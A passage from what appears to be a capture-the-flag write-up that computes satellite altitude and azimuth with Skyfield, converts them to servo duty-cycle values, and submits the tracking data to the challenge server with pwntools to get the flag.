start_time = datetime.utcfromtimestamp(start_time).replace(tzinfo=utc)
timestamp = timescale.utc(start_time)

# Now we can pull altitude and azimuth information.
# The third value returned by altaz() is the distance, which we don't need here.
altitude, azimuth, _ = satellite_vector.at(timestamp).altaz()
```

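Now for the final step: the altitude and azimuth need to be mapped onto the range of the servos. This posed a slight problem, since the azimuth returned by altaz() ranges from 0 to 360 degrees whereas the servos only support 0 to 180. For the far half of the sky, we therefore wrap the azimuth into 0-180 and flip the elevation to 180 minus the altitude, pointing the antenna “over the top” instead: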

```python
duty_start = 2457
duty_end = 7372


def angle_to_duty(angle):
    # Wrap the angle into the servo's 0-180 degree range
    angle = angle % 180
    # Duty-cycle counts per degree
    conversion = (duty_end - duty_start) / 180
    # Scale into the duty range, offset by the 0-degree duty value
    duty = angle * conversion + duty_start
    # The servo only accepts integers, so truncate the fractional part
    return int(duty)


azimuth_duty = angle_to_duty(azimuth.degrees)
if azimuth.degrees > 180:
    # Far half of the sky: flip the elevation over the top
    altitude_duty = angle_to_duty(180 - altitude.degrees)
else:
    altitude_duty = angle_to_duty(altitude.degrees)

solution = (start_time, azimuth_duty, altitude_duty)
```
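Written out, the mapping implemented by `angle_to_duty` and the azimuth check, with azimuth $\alpha$ and altitude $\epsilon$ in degrees, is below, followed by a worked example for a satellite at $\alpha = 270^\circ$, $\epsilon = 30^\circ$ (illustrative numbers, not taken from the challenge). Since $\theta \bmod 180$ is non-negative, Python's `int()` truncation is the same as the floor.

$$
d(\theta) = \left\lfloor 2457 + (\theta \bmod 180)\,\frac{7372 - 2457}{180} \right\rfloor,
\qquad
(d_{az},\, d_{el}) =
\begin{cases}
\bigl(d(\alpha),\ d(\epsilon)\bigr) & \alpha \le 180^\circ \\
\bigl(d(\alpha),\ d(180 - \epsilon)\bigr) & \alpha > 180^\circ
\end{cases}
$$

$$
d(270) = \left\lfloor 2457 + 90 \cdot \tfrac{4915}{180} \right\rfloor = \lfloor 4914.5 \rfloor = 4914,
\qquad
d(180 - 30) = \left\lfloor 2457 + 150 \cdot \tfrac{4915}{180} \right\rfloor = \lfloor 6552.8\overline{3} \rfloor = 6552
$$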

Now that we have a solution for a specific time, we can create a function to generate tracking data for the entire period:

```python
def do_track(satellite_name, ground_latitude, ground_longitude, start_time, observations=720, time_scale=1):
    tracking = []
    satellite = satellites[satellite_name]
    location = Topos(ground_latitude, ground_longitude)
    satellite_vector = satellite - location

    # One observation every `time_scale` seconds
    for i in range(observations):
        # Calculate the current time
        curr_time = start_time + i * time_scale
        # Convert to a Skyfield time (needs a tz-aware UTC datetime)
        timestamp = timescale.utc(datetime.utcfromtimestamp(curr_time).replace(tzinfo=utc))
        # Get altitude and azimuth information
        altitude, azimuth, _ = satellite_vector.at(timestamp).altaz()
        # Calculate the servo duty values, flipping the elevation when azimuth > 180
        azimuth_duty = angle_to_duty(azimuth.degrees)
        if azimuth.degrees > 180:
            altitude_duty = angle_to_duty(180 - altitude.degrees)
        else:
            altitude_duty = angle_to_duty(altitude.degrees)
        # Save exactly one entry per observation
        tracking.append((curr_time, azimuth_duty, altitude_duty))
    return tracking
```

To connect to the server we use pwntools, and the Python library Skyfield also needs to be installed. This brings us to the full solution:

```python
from pwn import *
from skyfield.api import load, utc, Topos
from datetime import datetime

satellites = load.tle_file('active.txt')
satellites = {i.name: i for i in satellites}
timescale = load.timescale()

ticket = 'ticket{...}'


def angle_to_duty(angle):
    duty_start = 2457
    duty_end = 7372
    # Wrap the angle into the servo's 0-180 degree range
    angle = angle % 180
    # Duty-cycle counts per degree
    conversion = (duty_end - duty_start) / 180
    # Scale into the duty range, offset by the 0-degree duty value
    duty = angle * conversion + duty_start
    # The servo only accepts integers, so truncate the fractional part
    return int(duty)


def do_track(satellite_name, ground_latitude, ground_longitude, start_time, observations=720, time_scale=1):
    tracking = []
    satellite = satellites[satellite_name]
    location = Topos(ground_latitude, ground_longitude)
    satellite_vector = satellite - location

    # One observation every `time_scale` seconds
    for i in range(observations):
        curr_time = start_time + i * time_scale
        # Skyfield needs a tz-aware UTC datetime
        timestamp = timescale.utc(datetime.utcfromtimestamp(curr_time).replace(tzinfo=utc))
        altitude, azimuth, _ = satellite_vector.at(timestamp).altaz()
        # Servo duty values, flipping the elevation when azimuth > 180
        azimuth_duty = angle_to_duty(azimuth.degrees)
        if azimuth.degrees > 180:
            altitude_duty = angle_to_duty(180 - altitude.degrees)
        else:
            altitude_duty = angle_to_duty(altitude.degrees)
        tracking.append((curr_time, azimuth_duty, altitude_duty))
    return tracking


if __name__ == '__main__':
    r = remote('trackthesat.satellitesabove.me', 5031)
    r.recvuntil('Ticket please:\n')
    r.sendline(ticket)

    r.recvuntil('Latitude: ')
    ground_latitude = float(r.recvline()[:-1])
    r.recvuntil('Longitude: ')
    ground_longitude = float(r.recvline()[:-1])
    r.recvuntil('Satellite: ')
    satellite_name = r.recvline()[:-1].decode()
    r.recvuntil('Start time GMT: ')
    start_time = float(r.recvline()[:-1])
    r.recvuntil('...\n')

    # One "time, azimuth duty, elevation duty" line per observation, then a blank line
    for i in do_track(satellite_name, ground_latitude, ground_longitude, start_time):
        r.sendline('%s, %s, %s' % i)
    r.sendline()

    r.recvuntil('Congratulations: ')
    flag = r.recvline()[:-1].decode()
    r.close()
    print(flag)
```